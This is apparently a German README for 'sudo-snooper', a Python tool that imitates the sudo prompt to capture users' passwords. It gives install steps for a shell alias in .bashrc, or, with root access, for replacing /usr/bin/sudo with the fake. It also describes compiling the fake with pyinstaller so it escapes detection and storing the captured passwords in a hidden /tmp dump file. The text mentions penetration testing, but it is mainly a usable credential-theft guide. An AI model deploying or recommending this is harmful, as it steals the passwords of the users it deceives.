
Python-Skript, das sich wie das originale sudo-Binary verhält, um Benutzer dazu zu bringen, ihre Passwörter einzugeben.
sudo-snooper verhält sich wie das originale sudo-Binary, um Benutzer dazu zu bringen, ihr Passwort einzugeben.
Es zeigt einen gefälschten Prompt genau wie das Original an, damit der Benutzer sein sudo-Passwort eingibt.
Dies kann bei Penetrationstests oder Sicherheitsbewertungen nützlich sein, um das Benutzerwissen zu testen.
Diese Option ist einfacher umzusetzen und portabler, aber für aufmerksame Benutzer möglicherweise auffälliger.
Bearbeiten Sie die .rc-Datei der verwendeten Shell (kann .bashrc, .zshrc usw. sein) und fügen Sie folgendes hinzu:
alias sudo='python3 /path/to/sudo-snooper.py'
Stellen Sie sicher, dass sudo-snooper.py die richtigen Berechtigungen hat.
Sie benötigen Root-Zugriff für diese Installationsoption
Dies wird nur nützlich, wenn Sie bereits Root-Zugriff haben, aber aus irgendeinem Grund die Hashes aus /etc/shadow nicht knacken können. Im Grunde können Sie dem Benutzer sein Passwort abluchsen.
# mv /usr/bin/sudo /usr/bin/somename
Ändern Sie diese in sudo-snooper.py:
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
# install -dm755 sudo-snooper.py /usr/bin/sudo
Geben Sie der Python-Datei die notwendigen Berechtigungen
Hier können Sie ausgefallenere Methoden anwenden, wie eine nicht lesbare, aber ausführbare Datei für Benutzer, aber darauf gehe ich nicht ein. Schauen Sie sich einige Antworten hier dazu an.
HINWEIS: Eine etwas überzeugendere Installationsmethode ist die Kompilierung mit pyinstaller, sodass es nicht als Python-Datei erscheint, wenn file /usr/bin/sudo ausgeführt wird.
Unter Archlinux funktioniert dazu: pyinstaller --onefile sudo-snooper.py. Beachten Sie jedoch, dass Sie nach der Kompilierung die Parameter in der kompilierten Binärdatei nicht mehr ändern können.
Nach der Installation kann sudo-snooper wie normales sudo aufgerufen werden.
Zum Beispiel, wenn Sie
sudo vim /etc/resolv.conf
ausführen, wird sudo-snooper aufgerufen (vorausgesetzt, es ist korrekt installiert).
Es fragt nach dem Benutzerpasswort und führt dann den Befehl aus, indem es an das echte sudo-Binary weiterleitet, wenn das Passwort korrekt ist.
Sie können dann das Benutzerpasswort abrufen, indem Sie die Dump-Datei in den Einstellungen lesen.